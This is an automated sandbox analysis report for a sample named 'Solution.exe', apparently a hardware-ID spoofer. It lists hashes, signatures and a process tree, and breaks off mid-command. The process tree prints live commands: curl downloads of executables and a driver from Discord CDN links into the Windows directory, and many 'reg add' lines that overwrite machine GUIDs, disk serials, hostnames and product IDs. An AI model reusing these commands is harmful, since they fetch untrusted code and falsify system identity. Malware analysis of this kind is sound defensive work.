240a23bb8d3fc3329aa12516ece17d754bc5d1803092a3a3344f212d3c59df94

Resubmissions

20/12/2023, 11:12

231220-nbbrdsgaa4 8

20/12/2023, 11:08

231220-m817wafge3 8

20/12/2023, 11:05

231220-m68h6sfeg8 8

Analysis

max time kernel
20s
max time network
212s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
20/12/2023, 11:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solution.exe
Size

87KB
MD5

7bf1f379b20a36a53ec1ab3a1074f9e7
SHA1

c4cc98efdc6f7c470420455471506bd20a2ea01a
SHA256

240a23bb8d3fc3329aa12516ece17d754bc5d1803092a3a3344f212d3c59df94
SHA512

a0a209d50482386c382ed57246095ee2899343bf07ea7ea0cd4bba2578b37c4790f5369874f0cd6221c77652d06b74056d7d9dd77a98a655fcc99285d6bda251
SSDEEP

768:/AVldmeYxW0ofoAS4djhj7EvFZwS/TIdLjI7PFtq6K9Up5CGxkD7cVFsEd:/zeSbDg+bhTIdLjwPFtbK9qoykKdd

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\GameBarPresenceWriter\Mac.bat	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution64.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk2.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution64.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk2.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk1.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk1.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Mac.bat	curl.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "2862125300-116395651-1014725083"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "2862125300-116395651-1014725083"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "2862125300-116395651-1014725083"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "2862125300-116395651-1014725083"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client"	svchost.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
3284	reg.exe
3448	reg.exe
3288	reg.exe
2396	reg.exe
4036	reg.exe
3696	reg.exe
1540	reg.exe
4548	reg.exe
1264	reg.exe
4548	reg.exe
1124	reg.exe
4488	reg.exe
2852	reg.exe
1960	reg.exe
3280	reg.exe
4036	reg.exe
2852	reg.exe
448	reg.exe
3288	reg.exe
2376	reg.exe
4608	reg.exe
1324	reg.exe
448	reg.exe
2660	reg.exe
3084	reg.exe
3020	reg.exe
3272	reg.exe
4432	reg.exe
3280	reg.exe
3436	reg.exe
3284	reg.exe
2536	reg.exe
2416	reg.exe
2972	reg.exe
3236	reg.exe
3712	reg.exe
1884	reg.exe
2536	reg.exe
3436	reg.exe
260	reg.exe
3560	reg.exe
4536	reg.exe
5012	reg.exe
3020	reg.exe
1324	reg.exe
2416	reg.exe
4352	reg.exe
4536	reg.exe
4632	reg.exe
1116	reg.exe
1124	reg.exe
2292	reg.exe
3084	reg.exe
4656	reg.exe
3136	reg.exe
4352	reg.exe
3560	reg.exe
3272	reg.exe
3696	reg.exe
2656	reg.exe
1884	reg.exe
4608	reg.exe
2972	reg.exe
4516	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3892	WMIC.exe
Token: SeSecurityPrivilege	3892	WMIC.exe
Token: SeTakeOwnershipPrivilege	3892	WMIC.exe
Token: SeLoadDriverPrivilege	3892	WMIC.exe
Token: SeSystemProfilePrivilege	3892	WMIC.exe
Token: SeSystemtimePrivilege	3892	WMIC.exe
Token: SeProfSingleProcessPrivilege	3892	WMIC.exe
Token: SeIncBasePriorityPrivilege	3892	WMIC.exe
Token: SeCreatePagefilePrivilege	3892	WMIC.exe
Token: SeBackupPrivilege	3892	WMIC.exe
Token: SeRestorePrivilege	3892	WMIC.exe
Token: SeShutdownPrivilege	3892	WMIC.exe
Token: SeDebugPrivilege	3892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3892	WMIC.exe
Token: SeRemoteShutdownPrivilege	3892	WMIC.exe
Token: SeUndockPrivilege	3892	WMIC.exe
Token: SeManageVolumePrivilege	3892	WMIC.exe
Token: 33	3892	WMIC.exe
Token: 34	3892	WMIC.exe
Token: 35	3892	WMIC.exe
Token: 36	3892	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3892	WMIC.exe
Token: SeSecurityPrivilege	3892	WMIC.exe
Token: SeTakeOwnershipPrivilege	3892	WMIC.exe
Token: SeLoadDriverPrivilege	3892	WMIC.exe
Token: SeSystemProfilePrivilege	3892	WMIC.exe
Token: SeSystemtimePrivilege	3892	WMIC.exe
Token: SeProfSingleProcessPrivilege	3892	WMIC.exe
Token: SeIncBasePriorityPrivilege	3892	WMIC.exe
Token: SeCreatePagefilePrivilege	3892	WMIC.exe
Token: SeBackupPrivilege	3892	WMIC.exe
Token: SeRestorePrivilege	3892	WMIC.exe
Token: SeShutdownPrivilege	3892	WMIC.exe
Token: SeDebugPrivilege	3892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3892	WMIC.exe
Token: SeRemoteShutdownPrivilege	3892	WMIC.exe
Token: SeUndockPrivilege	3892	WMIC.exe
Token: SeManageVolumePrivilege	3892	WMIC.exe
Token: 33	3892	WMIC.exe
Token: 34	3892	WMIC.exe
Token: 35	3892	WMIC.exe
Token: 36	3892	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe
Token: SeSecurityPrivilege	4064	WMIC.exe
Token: SeTakeOwnershipPrivilege	4064	WMIC.exe
Token: SeLoadDriverPrivilege	4064	WMIC.exe
Token: SeSystemProfilePrivilege	4064	WMIC.exe
Token: SeSystemtimePrivilege	4064	WMIC.exe
Token: SeProfSingleProcessPrivilege	4064	WMIC.exe
Token: SeIncBasePriorityPrivilege	4064	WMIC.exe
Token: SeCreatePagefilePrivilege	4064	WMIC.exe
Token: SeBackupPrivilege	4064	WMIC.exe
Token: SeRestorePrivilege	4064	WMIC.exe
Token: SeShutdownPrivilege	4064	WMIC.exe
Token: SeDebugPrivilege	4064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4064	WMIC.exe
Token: SeRemoteShutdownPrivilege	4064	WMIC.exe
Token: SeUndockPrivilege	4064	WMIC.exe
Token: SeManageVolumePrivilege	4064	WMIC.exe
Token: 33	4064	WMIC.exe
Token: 34	4064	WMIC.exe
Token: 35	4064	WMIC.exe
Token: 36	4064	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 840 wrote to memory of 3748	840	Solution.exe	88
PID 840 wrote to memory of 3748	840	Solution.exe	88
PID 840 wrote to memory of 744	840	Solution.exe	89
PID 840 wrote to memory of 744	840	Solution.exe	89
PID 840 wrote to memory of 3900	840	Solution.exe	92
PID 840 wrote to memory of 3900	840	Solution.exe	92
PID 3900 wrote to memory of 1716	3900	cmd.exe	94
PID 3900 wrote to memory of 1716	3900	cmd.exe	94
PID 840 wrote to memory of 4016	840	Solution.exe	95
PID 840 wrote to memory of 4016	840	Solution.exe	95
PID 4016 wrote to memory of 3292	4016	cmd.exe	96
PID 4016 wrote to memory of 3292	4016	cmd.exe	96
PID 840 wrote to memory of 1296	840	Solution.exe	97
PID 840 wrote to memory of 1296	840	Solution.exe	97
PID 1296 wrote to memory of 1372	1296	cmd.exe	98
PID 1296 wrote to memory of 1372	1296	cmd.exe	98
PID 840 wrote to memory of 632	840	Solution.exe	99
PID 840 wrote to memory of 632	840	Solution.exe	99
PID 632 wrote to memory of 1820	632	cmd.exe	100
PID 632 wrote to memory of 1820	632	cmd.exe	100
PID 840 wrote to memory of 4924	840	Solution.exe	101
PID 840 wrote to memory of 4924	840	Solution.exe	101
PID 4924 wrote to memory of 1092	4924	cmd.exe	102
PID 4924 wrote to memory of 1092	4924	cmd.exe	102
PID 840 wrote to memory of 4960	840	Solution.exe	104
PID 840 wrote to memory of 4960	840	Solution.exe	104
PID 4960 wrote to memory of 2956	4960	cmd.exe	105
PID 4960 wrote to memory of 2956	4960	cmd.exe	105
PID 840 wrote to memory of 2976	840	Solution.exe	106
PID 840 wrote to memory of 2976	840	Solution.exe	106
PID 2976 wrote to memory of 3696	2976	cmd.exe	108
PID 2976 wrote to memory of 3696	2976	cmd.exe	108
PID 840 wrote to memory of 2208	840	Solution.exe	109
PID 840 wrote to memory of 2208	840	Solution.exe	109
PID 2208 wrote to memory of 260	2208	cmd.exe	110
PID 2208 wrote to memory of 260	2208	cmd.exe	110
PID 840 wrote to memory of 1960	840	Solution.exe	111
PID 840 wrote to memory of 1960	840	Solution.exe	111
PID 1960 wrote to memory of 3236	1960	cmd.exe	112
PID 1960 wrote to memory of 3236	1960	cmd.exe	112
PID 840 wrote to memory of 1264	840	Solution.exe	113
PID 840 wrote to memory of 1264	840	Solution.exe	113
PID 1264 wrote to memory of 4608	1264	cmd.exe	114
PID 1264 wrote to memory of 4608	1264	cmd.exe	114
PID 840 wrote to memory of 1324	840	Solution.exe	115
PID 840 wrote to memory of 1324	840	Solution.exe	115
PID 1324 wrote to memory of 4516	1324	cmd.exe	116
PID 1324 wrote to memory of 4516	1324	cmd.exe	116
PID 840 wrote to memory of 5088	840	Solution.exe	117
PID 840 wrote to memory of 5088	840	Solution.exe	117
PID 5088 wrote to memory of 3448	5088	cmd.exe	118
PID 5088 wrote to memory of 3448	5088	cmd.exe	118
PID 840 wrote to memory of 4572	840	Solution.exe	119
PID 840 wrote to memory of 4572	840	Solution.exe	119
PID 4572 wrote to memory of 5100	4572	cmd.exe	120
PID 4572 wrote to memory of 5100	4572	cmd.exe	120
PID 840 wrote to memory of 2416	840	Solution.exe	121
PID 840 wrote to memory of 2416	840	Solution.exe	121
PID 2416 wrote to memory of 1540	2416	cmd.exe	122
PID 2416 wrote to memory of 1540	2416	cmd.exe	122
PID 840 wrote to memory of 4900	840	Solution.exe	123
PID 840 wrote to memory of 4900	840	Solution.exe	123
PID 4900 wrote to memory of 4000	4900	cmd.exe	124
PID 4900 wrote to memory of 4000	4900	cmd.exe	124

C:\Users\Admin\AppData\Local\Temp\Solution.exe
"C:\Users\Admin\AppData\Local\Temp\Solution.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
    3⤵
    - Drops file in Windows directory
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
    3⤵
    - Drops file in Windows directory
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
    3⤵
    - Drops file in Windows directory
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
    3⤵
    - Drops file in Windows directory
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
    3⤵
    - Drops file in Windows directory
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 28618 /f
    3⤵
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 28618 /f
    3⤵
    - Modifies registry key
    PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2208
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2861814552-2654314356-3260021156} /f
    3⤵
    PID:260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2861814552-2654314356-3260021156 /f
    3⤵
    - Modifies registry key
    PID:3236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2861814552-2654314356-3260021156} /f
    3⤵
    - Modifies registry key
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2861814552-2654314356-3260021156} /f
    3⤵
    - Modifies registry key
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5088
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2861814552-2654314356-3260021156 /f
    3⤵
    - Modifies registry key
    PID:3448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2861814552-2654314356-3260021156 /f
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2861814552-2654314356-3260021156 /f
    3⤵
    - Modifies registry key
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4656
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2292
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4036
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4536
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2324
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1956
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:1116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4444
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3964
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {2862125300-116395651-1014725083} /f
    3⤵
    - Modifies registry key
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1804
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2652
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2056
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3864
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4896
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4936
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
